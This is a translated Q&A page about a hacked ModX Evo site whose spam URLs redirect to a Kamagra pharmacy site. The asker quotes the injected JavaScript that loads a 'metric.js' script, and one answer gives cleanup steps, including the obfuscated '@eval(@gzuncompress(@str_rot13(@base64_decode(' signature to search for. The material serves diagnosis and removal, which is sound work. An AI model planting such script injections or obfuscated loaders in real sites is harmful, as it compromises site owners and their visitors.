web-dev-qa-db-fra.com

Site piraté: redirection vers un autre site?

J'ai un site qui apparaît et fonctionne bien.

Cependant, si vous le recherchez dans Google, de nombreux autres liens apparaissent, par exemple:

mysite.com/kamagra-viagra.html

En cliquant dessus, je suis redirigé vers le site Kamagra.

J'ai scanné des virus sur mon site et je ne peux rien trouver.

J'utilise le CMS ModX Evo.

Quelqu'un peut-il suggérer un fichier en particulier que je devrais être en train de rechercher?

MODIFIER:

J'ai remarqué des javascript étranges dans mon en-tête:

<script type="text/javascript" src="http://www.mysite.com/home.html?getjs=metric.js"></script>
<script type="text/javascript">var j1s = document.createElement('script');j1s.type = 'text/javascript';j1s.src = 'http://www.mysite.com/home.html?getjs=metric.js?getjs=metric.js';var h1ead = document.getElementsByTagName('head')[0];h1ead.appendChild(j1s);</script>

Ce n'est pas dans mon fichier de modèle, mais apparaît lorsque la page est chargée. Je soupçonne que c'est le problème.

1
MeltingDog

Il y a des tonnes de possibilités. Votre fichier .htaccess peut être compromis et une instruction de redirection est en cours d'évaluation pour renvoyer les utilisateurs, mais il s'agit d'un hack assez grossier, facile à trouver et à réparer.

Il est plus probable que du code obfusqué ait été injecté dans un ou plusieurs de vos fichiers de base du CMS. Ce code s'exécute sur chaque accès. Il génère des liens de spam pour la consommation de Googlebot et injecte également un code JavaScript pour renvoyer les utilisateurs. Le truc ici consiste à déterminer quel fichier a été modifié et comment les attaquants ont pu y accéder, et ce processus peut être très difficile pour les personnes non formées à la sécurité.

Il est également possible que la base de données contenant le contenu du site ait été compromise et que des codes malveillants y aient été injectés. Cela peut être fatal à un site si vous ne disposez pas des sauvegardes sécurisées de votre contenu.

En tout état de cause, une lecture attentive des scénarios ci-dessus soulève deux questions fondamentales:

  1. Comment sont-ils entrés?
  2. Qu'ont-ils changé?

Le suivi évident étant "Comment puis-je résoudre ce problème?"

À moins que vous n’ayez beaucoup d’expérience dans le diagnostic et la résolution de problèmes de sécurité, vous pouvez laisser cela à un professionnel. Il y a des consultants qui vont le faire ainsi que des services basés sur des abonnements tels que Stop The Hacker ou Sucuri.

2
JCL1178

C'est un hack qui semble avoir compromis plusieurs installations obsolètes de MODx Evo. Je viens d'en fixer un, voici ce qu'il fallait faire:

  1. Dans le gestionnaire de MODx, sélectionnez Eléments> Gérer les éléments> Plug-ins> "Quick ManagerManager".
  2. Rechercher le code @eval(@gzuncompress(@str_rot13(@base64_decode(
    (Je l'ai trouvé au bas du fichier)
    • Il s’agit du code malveillant codé qui entraîne l’insertion du script metric.js en haut de votre page d’accueil.
  3. Supprimez cette très grande ligne et cliquez sur Enregistrer.
  4. Maintenant, allez dans Plugins> "Recherche en surbrillance". L'ensemble de ce plugin semble avoir été inséré par l'attaque.
    • Cela provoque les URL comme/best-website-kamagra sur votre site Web pour rediriger vers un autre site. Je l'ai trouvé en cherchant dans la base de données str_rot13.
  5. Supprimer ce plugin.
  6. Accédez au répertoire Éléments> Gérer les fichiers> actifs, puis supprimez le répertoire "cache".
  7. Téléchargez un répertoire de ressources/cache propre à partir de distribution MODx Evo .
0
David Cook